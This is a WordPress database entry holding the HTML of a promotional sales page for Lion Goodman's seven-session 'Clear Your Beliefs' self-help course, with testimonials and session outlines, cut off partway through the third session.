(981, 2, '2014-06-17 19:59:50', '2014-06-18 00:59:50', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you 